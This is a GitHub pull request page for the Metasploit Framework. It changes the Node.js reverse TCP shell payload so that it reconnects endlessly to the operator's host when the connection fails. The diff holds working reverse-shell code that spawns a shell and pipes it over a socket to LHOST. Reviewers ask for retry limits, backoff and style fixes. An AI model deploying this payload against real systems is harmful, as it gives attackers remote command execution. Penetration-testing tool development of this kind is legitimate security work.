-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Enhancing the functionality on the nodejs shell_reverse_tcp payload. #9077
Changes from 2 commits
763720c
374c139
a0abffb
6df8c40
b8d0986
9afc8b5
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -56,16 +56,22 @@ def nodejs_reverse_tcp(opts={}) | |
util = require("util"), | ||
sh = cp.spawn(cmd, []); | ||
var client = this; | ||
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() { | ||
client.socket.pipe(sh.stdin); | ||
if (typeof util.pump === "undefined") { | ||
sh.stdout.pipe(client.socket); | ||
sh.stderr.pipe(client.socket); | ||
} else { | ||
util.pump(sh.stdout, client.socket); | ||
util.pump(sh.stderr, client.socket); | ||
} | ||
}); | ||
function StagerRepeat(){ | ||
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() { | ||
client.socket.pipe(sh.stdin); | ||
if (typeof util.pump === "undefined") { | ||
sh.stdout.pipe(client.socket); | ||
sh.stderr.pipe(client.socket); | ||
} else { | ||
util.pump(sh.stdout, client.socket); | ||
util.pump(sh.stderr, client.socket); | ||
} | ||
}); | ||
socket.on("error", function(error) { | ||
StagerRepeat(); | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. MaxRetries should be taken into account, this will loop ad nauseum. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. The loop runs like around 30+ times per second. If a MaxRetry value is specified, it will have to be in the range of ten thousands to keep the payload running for just a couple of minutes. @sempervictus There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This is doing a connect outbound, so having a backoff at the least should be added, a Each There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'm not very well accustomed to the nodejs predefined functions. Is there a similar function like time.sleep() in node as there is in python? @jmartin-r7 @sempervictus |
||
}); | ||
} | ||
StagerRepeat(); | ||
})(); | ||
EOS | ||
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'') | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Whitespace and style here is all over the place, note: "Metasploit requires spaces instead of hard tabs"
See https://github.com/rapid7/metasploit-framework/wiki/Style-Tips
I have offered a PR that I believe ends up a bit more readable and replace the hard tabs. @itsmeroy2012 take a look and merge if you are good with adjustments. I can complete testing and get this merged soon.
itsmeroy2012#7